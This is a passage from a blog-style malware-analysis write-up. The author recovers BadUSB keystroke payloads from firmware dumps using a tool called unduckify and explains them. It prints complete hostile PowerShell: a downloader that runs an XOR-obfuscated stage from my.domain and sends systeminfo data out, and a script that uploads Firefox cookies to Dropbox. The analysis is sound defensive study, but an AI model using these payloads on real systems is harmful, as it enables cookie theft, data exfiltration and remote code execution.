DEBUG: args.file=None
DEBUG: args.test='0,6, 0,16, 0,7, 0,44, 2,36, 0,14'
DEBUG: args.layout='es'
DEBUG: args.system='win'
DEBUG: args.verbose=True
INFO: Values to test: [0, 6, 0, 16, 0, 7, 0, 44, 2, 36, 0, 14]
DEBUG: key found!
DEBUG: (0,6) us='c', char='c', key_mod_values=[], key_values=['c'], alt=False, altGr=False, shift=False, combo='', comboAlt=False, comboAltGr=False, comboShift=False
DEBUG: key found!
DEBUG: (0,16) us='m', char='m', key_mod_values=[], key_values=['m'], alt=False, altGr=False, shift=False, combo='', comboAlt=False, comboAltGr=False, comboShift=False
DEBUG: key found!
DEBUG: (0,7) us='d', char='d', key_mod_values=[], key_values=['d'], alt=False, altGr=False, shift=False, combo='', comboAlt=False, comboAltGr=False, comboShift=False
DEBUG: space found!
DEBUG: (0,44) us=' ', char=' ', key_mod_values=[], key_values=[' ', 'Space'], alt=False, altGr=False, shift=False, combo='', comboAlt=False, comboAltGr=False, comboShift=False
DEBUG: key found!
DEBUG: (2,36) us='7', char='/', key_mod_values=['SHIFT', 'LSHIFT'], key_values=['7'], alt=False, altGr=False, shift=True, combo='', comboAlt=False, comboAltGr=False, comboShift=False
DEBUG: key found!
DEBUG: (0,14) us='k', char='k', key_mod_values=[], key_values=['k'], alt=False, altGr=False, shift=False, combo='', comboAlt=False, comboAltGr=False, comboShift=False
INFO: cmd /k
Example using a memory dump:
$ unduckify -f dump.bin -l us -s win
INFO: Binary loaded: /.../dump.bin
INFO: Analyze all flags starting with sym. and entry0 (aa)
INFO: Analyze imports (af@@@i)
INFO: Analyze entrypoint (af@ entry0)
INFO: Analyze symbols (af@@@s)
INFO: Recovering variables
INFO: Analyze all functions arguments/locals (afva@@@F)
INFO: Analyze function calls (aac)
INFO: find and analyze function preludes (aap)
INFO: Analyze len bytes of instructions for references (aar)
INFO: Finding and parsing C++ vtables (avrr)
INFO: Analyzing methods
INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav)
WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0
INFO: Emulate functions to find computed references (aaef)
INFO: Recovering local variables (afva)
INFO: Type matching analysis for all functions (aaft)
INFO: Propagate noreturn information (aanr)
INFO: Use -AA or aaaa to perform additional experimental analysis
INFO: binary_size=4522
INFO: len(functions)=14
INFO: extracted data: 04^]fHnPvXBfb8833=aF%Ff5dEgme3.$h=iwr -me o -useR('')-uR('{3}{1}{4}{0}{2}'-f'dom','tps://','ain/','ht','my.')|select H*;$h=$h.headers['x-'+[char]99+'tf'];$k=([byte]91,170,97,228,201,185,63,63,6,130,37,11,108,248,51,27,126,230,143,216);iex([System.Text.Encoding]::UTF8.GetString((0..([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($h)).Length-1)|ForEach-Object{([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($h))[$_] -bxor $k[$_ % $k.Length])})))powershell -ver 5 -nol -nop -ep bypassexitpowershell -nol -nop -ep bypass -c "Invoke-WebRequest -UserAgent '' -Uri http://my.domain/$([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($(systeminfo)))) | out-null"cmd /k/Ame7Dj<dn [zz{[[0zz22eL@fl22le0eL@ |]mnt[m][)6| 3vmn 6ftc2lemn3f]}}n]}]]}}f[[[y e@s!b2lL@Hf2leFnL@\xh2leLLN]6LLzzzz[ll2uzz[[)E000HFDB@#CE[U{{0n 0 CE0 U0 0"vnP,N2l[u5n3mx0]''eW@UET))ynNmTT.76 OQ{m
The extracted data contains a lot of garbage, but hidden within it is my payload! The payload is exactly the same but appears as a continuous string. Looking at this output makes it relatively easy to deduce what the badUSB is doing.
If we separate the lines, the payload becomes much clearer:
$h=iwr -me o -useR('')-uR('{3}{1}{4}{0}{2}'-f'dom','tps://','ain/','ht','my.')|select H*;
$h=$h.headers['x-'+[char]99+'tf'];
$k=([byte]91,170,97,228,201,185,63,63,6,130,37,11,108,248,51,27,126,230,143,216);
iex([System.Text.Encoding]::UTF8.GetString((0..([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($h)).Length-1)|ForEach-Object{([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($h))[$_] -bxor $k[$_ % $k.Length])})))
powershell -ver 5 -nol -nop -ep bypass
exit
powershell -nol -nop -ep bypass -c "Invoke-WebRequest -UserAgent '' -Uri http://my.domain/$([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($(systeminfo)))) | out-null"
cmd /k
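An analyst who captured the response header could decode the second stage offline instead of running it. The sketch below mirrors the PowerShell one-liner as I read it: Base64-decode the header, interpret the bytes as a UTF-8 string, XOR each character with the repeating key $k, and read the result as UTF-8. KEY is copied from the payload above; decode_stage and encode_stage are hypothetical names, and encode_stage is only my guess at the server side, added so the round trip can be tested.

```python
import base64

# The $k array from the recovered payload.
KEY = [91, 170, 97, 228, 201, 185, 63, 63, 6, 130,
       37, 11, 108, 248, 51, 27, 126, 230, 143, 216]


def decode_stage(header_value: str) -> str:
    """Base64 -> UTF-8 text -> per-character XOR with KEY -> UTF-8 script."""
    text = base64.b64decode(header_value).decode("utf-8")
    plain = bytes(ord(ch) ^ KEY[i % len(KEY)] for i, ch in enumerate(text))
    return plain.decode("utf-8")


def encode_stage(script: str) -> str:
    """Assumed inverse of decode_stage (not shown anywhere in the payload)."""
    mixed = "".join(
        chr(b ^ KEY[i % len(KEY)]) for i, b in enumerate(script.encode("utf-8"))
    )
    return base64.b64encode(mixed.encode("utf-8")).decode("ascii")


sample = "Write-Host 'hello'"
header = encode_stage(sample)
print(header)
print(decode_stage(header))
```

Decoding this way never executes the script, which is the safer option when the header comes from an unknown device.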
But since I already knew what was there, could we test it with another payload? Sure, let’s try it!
Reverse other random payloads from the Internet
There are a lot of resources with sample payloads, examples, or pranks for the Digispark BadUSB or the Rubber Ducky available on the internet. The majority of these payloads are in DuckyScript format. Some example repositories include:
I found a random payload and flashed it into the Digispark, but I don’t remember where I got it from. Let’s see if I can recover the payload using my unduckify tool:
$ unduckify -l us -s win -f ../dumps/digispark.bin
INFO: Binary loaded: /.../dumps/digispark.bin
INFO: Analyze all flags starting with sym. and entry0 (aa)
INFO: Analyze imports (af@@@i)
INFO: Analyze entrypoint (af@ entry0)
INFO: Analyze symbols (af@@@s)
INFO: Recovering variables
INFO: Analyze all functions arguments/locals (afva@@@F)
INFO: Analyze function calls (aac)
INFO: find and analyze function preludes (aap)
INFO: Analyze len bytes of instructions for references (aar)
INFO: Finding and parsing C++ vtables (avrr)
INFO: Analyzing methods
INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav)
WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0
INFO: Emulate functions to find computed references (aaef)
INFO: Recovering local variables (afva)
INFO: Type matching analysis for all functions (aaft)
INFO: Propagate noreturn information (aanr)
INFO: Use -AA or aaaa to perform additional experimental analysis
INFO: binary_size=4430
INFO: len(functions)=12
INFO: extracted data: 04^]fHnPvXBfb8833=aF%Ff5dEgme3.Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $filePath; exit;$headers.Add("Content-Type", "application/octet-stream")$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')$headers.Add("Authorization", "Bearer $accessToken")$headers = @{}$dropboxFilePath = "/cookies_exported.sqlite"$uploadUrl = "https://content.dropboxapi.com/2/files/upload" $accessToken = "DROPBOX_ACCESS_TOKEN"$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'$firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'powershell/AmnDj<dn L@fl22le0eL@ |]mnt[m][)6| 3vmn 6ftc2lemn3f]}}n]}]]}}f[[[y e@s!b2lL@Hf2leFnL@\xh2leLLN]6LLzzzz[ll2uzz[[)E000HFDB@#CE[U{{0n 0 CE0 U0 0"vnP,N2l[u5n3mx0]''eW@UET))ynNmTT.OQ{mB
Let’s analyze the extracted data after cleaning it up:
powershell
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
$firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
$dropboxFilePath = "/cookies_exported.sqlite"
$accessToken = "DROPBOX_ACCESS_TOKEN"
$headers = @{}
$headers.Add("Content-Type", "application/octet-stream")
$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
$headers.Add("Authorization", "Bearer $accessToken")
Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $filePath;
exit;
It is clearly a Firefox cookie exfiltration using PowerShell. It searches for the cookies.sqlite database and uploads it to Dropbox using a custom ACCESS_TOKEN.
The unduckify tool works really well; it’s plug-and-play once you have the memory dump (as long as the firmware was built using Duckify). This allows for efficient extraction and analysis of payloads, even if the original source is forgotten or unavailable.
Conclusions
We have successfully analyzed a USB device without plugging it into the computer. This project spanned several months, and I am satisfied with the final results and all the knowledge gained.
I’m happy to have finally solved a problem I had set for myself. I can continue with my life now.
I also really loved automating everything and playing with radare2 <3
And remember, if you ever find a USB stick in the parking lot, don’t plug it in, reverse it!